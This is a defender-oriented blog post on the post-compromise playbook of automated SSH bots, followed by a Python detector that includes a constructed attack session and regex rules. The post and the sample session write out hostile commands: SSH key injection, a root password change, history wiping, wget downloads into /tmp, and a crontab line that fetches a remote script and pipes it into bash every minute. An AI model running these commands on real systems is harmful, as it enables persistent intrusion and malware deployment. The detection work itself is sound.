Peering into the Abyss: The Automated Attacker's Playbook Revealed


Ever wondered what happens in the first few moments after a web server is compromised? Thanks to monitoring attacks over many sessions, we don't have to wonder: we can watch it happen in real time. By analysing the logs from those sessions, we've pieced together the common playbook used by automated bots from around the globe. Their methods are fast, efficient, and offer crucial lessons for anyone defending a network.
Here are the most common techniques and behaviours I observed.
1. Securing the Beachhead: Immediate and Redundant Persistence
The very first priority for these attackers is ensuring they can't be easily kicked out. Before they even bother to see what kind of system they've landed on, their scripts immediately work to create multiple ways back in.
- SSH Key Injection: The most common action is to completely wipe and recreate the `.ssh` directory. The script then injects the attacker's own public SSH key into the `authorized_keys` file. This gives them persistent, password-less access for future sessions.
- Changing the Root Password: As a secondary form of access, the scripts immediately change the root password using the `chpasswd` command. The new passwords appear to be randomly generated for each attack, highlighting the automated nature of the campaign.
2. Sizing Up the Prize: Rapid System Reconnaissance
Once persistence is established, the bots run a swift, automated reconnaissance sweep to profile the machine. This helps them determine the system's capabilities, likely to see if it's a valuable target for resource-intensive tasks like cryptocurrency mining and what specific malware to deploy.
This discovery phase involves a barrage of standard Linux commands:
- Hardware Inspection: They check things like the CPU model, core count, and architecture (`cat /proc/cpuinfo`, `lscpu`, `uname -m`).
- Memory and Disk Space: They check available RAM (`free -m`) and disk space (`df -h`).
- Operating System Details: They verify the kernel version and OS information with `uname -a`.
- User Activity: They check who is logged in with `w` and `whoami`. The latter is likely used to confirm which brute-forced account succeeded at logon.
3. Erasing the Competition: Defence Evasion and Anti-Forensics
These attackers exhibit a "king of the hill" mentality. Their scripts include commands specifically designed to find and eliminate competing malware or system monitoring tools.
- Killing Competing Processes: The scripts frequently attempt to kill processes with common malware names like `secure.sh` and `auth.sh`.
- Clearing Firewall Rules: They often wipe the contents of `/etc/hosts.deny`, a file used to block incoming connections, to ensure their own command-and-control servers aren't blocked.
- Unlocking Files: A common first step before modifying SSH keys is running `chattr -ia .ssh`. This removes the "immutable" attribute from the directory, a security measure sometimes used by administrators to prevent unauthorised changes.
- Wiping History: Some of the more thorough scripts conclude by running `history -c` to clear the command history, a simple but effective anti-forensics technique.
4. The Payload Drop: Downloading Malicious Code
After profiling the system and clearing out rivals, the primary objective begins: downloading the malware. Attackers consistently use built-in command-line tools for this, a technique known as "Living off the Land" because it uses the system's own utilities to avoid detection.
- Use of `wget` and `curl`: Attackers may use `wget`, `curl`, SCP or SFTP to fetch their payloads from a remote server. These payloads are often generic shell scripts (`sh`) or known malware binaries like `kinsing`, a notorious cryptominer.
- Use of `/tmp`: The `/tmp` directory is the preferred location for downloading these files, as it is almost always world-writable.
5. Execution and Hiding: Running the Malware
Once the payload is on the system, the final steps are to make it executable and run it in a way that survives the end of the SSH session.
- Making Files Executable: The `chmod 777` or `chmod +x` command is used to grant execute permissions to the downloaded file.
- Detaching from the Terminal: Attackers use `nohup ... &` to run their malware as a background process that won't be terminated when their session closes.
6. Establishing Long-Term Persistence with Cron
Beyond just adding an SSH key, some of the more advanced scripts add a scheduled task, or cron job, to ensure their malware is re-executed automatically. This guarantees the malicious process will restart even if a system administrator finds and kills it or the server is rebooted.
- Command Example: `(crontab -l 2>/dev/null; echo "* * * * * curl -sL http://[REDACTED]/sc.sh | bash > /dev/null 2>&1") | crontab -`. This command downloads and executes a script from a remote server every single minute.
Takeaways for Defenders
The behaviour of these bots is predictable, which is good news for defenders. Monitoring for this specific sequence of actions can provide early warnings of a compromise:
- Monitor Critical Files: Keep a close eye on changes to `~/.ssh/authorized_keys`, `/etc/passwd`, and `/etc/hosts.deny`.
- Scrutinise Network Traffic: Look for unusual outbound connections from tools like `curl` and `wget` to unknown IP addresses.
- Audit Process Execution: Be suspicious of processes being executed from world-writable directories like `/tmp`.
- Regularly Check Cron Jobs: Periodically review `crontab` entries for all users to catch malicious scheduled tasks.
- Harden SSH: Disable password-based authentication for root users and enforce the use of strong SSH keys to prevent the initial intrusion.
- Passwords: If you are going to use passwords, make sure they are really, really strong and haven't been compromised!
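To make the takeaways concrete, here is an added example (not code from the original post) that maps a constructed shell session against the playbook phases described above and separately flags the fetch-and-run crontab pattern from section 6. The session text, the phase regexes and the minimum-phase threshold are assumptions for illustration, not real captures or tuned rules.

```python
import re

# Constructed sample session modelled on the playbook in the post (not a real capture).
SAMPLE_SESSION = """\
chattr -ia .ssh
echo "ssh-rsa AAAAEXAMPLEKEY attacker" > .ssh/authorized_keys
echo "root:Zx9qLmP2" | chpasswd
cat /proc/cpuinfo | grep name | wc -l
uname -a
w
pkill -f secure.sh
echo "" > /etc/hosts.deny
cd /tmp; wget -q http://[REDACTED]/sc.sh
chmod 777 sc.sh
nohup ./sc.sh > /dev/null 2>&1 &
(crontab -l 2>/dev/null; echo "* * * * * curl -sL http://[REDACTED]/sc.sh | bash") | crontab -
history -c
"""

# One regex per phase of the playbook, applied to a single command line (assumed patterns).
PHASES = {
    "persistence_ssh": re.compile(r"authorized_keys|chattr\s+-ia\s+\S*\.ssh"),
    "persistence_passwd": re.compile(r"\bchpasswd\b"),
    "recon": re.compile(r"/proc/cpuinfo|\blscpu\b|\buname\b|\bfree -m\b|\bdf -h\b|^\s*(w|whoami)\s*$"),
    "evasion": re.compile(r"\bp?kill\b|hosts\.deny|history -c"),
    "payload": re.compile(r"\b(wget|curl|scp|sftp)\b"),
    "execution": re.compile(r"chmod\s+(777|\+x)|\bnohup\b"),
    "cron": re.compile(r"\bcrontab\b"),
}

def classify_line(line):
    """Return the names of every phase whose pattern matches this command line."""
    return [name for name, rx in PHASES.items() if rx.search(line)]

def analyse_session(text):
    """Group the session's command lines by the playbook phase they belong to."""
    hits = {name: [] for name in PHASES}
    for line in text.splitlines():
        for name in classify_line(line):
            hits[name].append(line.strip())
    return hits

def is_bot_playbook(hits, min_phases=4):
    """A single session touching several phases is the sequence the post describes."""
    return sum(1 for lines in hits.values() if lines) >= min_phases

def cron_fetch_and_run(entry):
    """Flag a crontab entry that downloads content and pipes it straight into a shell."""
    return bool(re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", entry))
```

Feed `analyse_session` the command lines from auditd, a shell audit log or a honeypot session, and review any user's `crontab -l` output line by line with `cron_fetch_and_run`.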
Conclusion: The Predictable Robot Dance
So, while peering into the world of automated attacks can seem a little intimidating, there's a silver lining: it's all just a predictable robot dance. These bots aren't cunning masterminds; they're following the same simple script over and over.
Their predictability is their greatest weakness and your greatest strength. By learning the techniques used, you can build a defence that easily trips them up. Keep your systems updated, your monitoring sharp, always validate and you can stay one step ahead of the bots. Happy defending!
Written by Shak